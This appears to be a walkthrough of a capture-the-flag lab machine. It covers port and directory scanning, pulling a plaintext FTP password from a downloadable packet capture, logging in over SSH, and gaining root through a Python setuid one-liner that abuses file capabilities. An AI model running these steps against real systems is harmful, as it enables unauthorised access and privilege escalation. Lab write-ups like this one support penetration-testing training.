Enumeration
nmap -sV 10.129.228.42
Port 80 is open. Let's check it by entering the IP address in our browser.
gobuster dir -w /usr/share/dirb/wordlists/common.txt -u 10.129.228.42
Now let's open our browser again and check:
10.129.228.42/data
10.129.228.42/ip
10.129.228.42/netstat
10.129.228.42/data seems interesting. I tried several combinations but found something interesting with 10.129.228.42/data/0
If you type 10.129.228.42/data/0 in your browser, you find a file to download.
Download the file. It is called 0.pcap
Looks like a pcap file, so let's open Wireshark and look more into it.
In Parrot machine, go to Applications --> Pentesting --> Sniffing and Spoofing --> wireshark
Once Wireshark loads, Click on File --> Open
Locate your 0.pcap file and click on open
In the filter field, type FTP to filter only the FTP protocol. We can see the password used by Nathan in plaintext!
Foothold
We know that ssh is open too so let's try that:
ssh nathan@10.129.228.42
You are prompted to enter a password. Enter the password we just found.
The credentials worked and we are in.
ls
cat user.txt
You got your flag!
Privilege Escalation
id
getcap -r / 2>/dev/null
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Now we are root!
id
ls
cd /root
ls
cat root.txt
Now we got the root flag too!
Congratulations!
Opmerkingen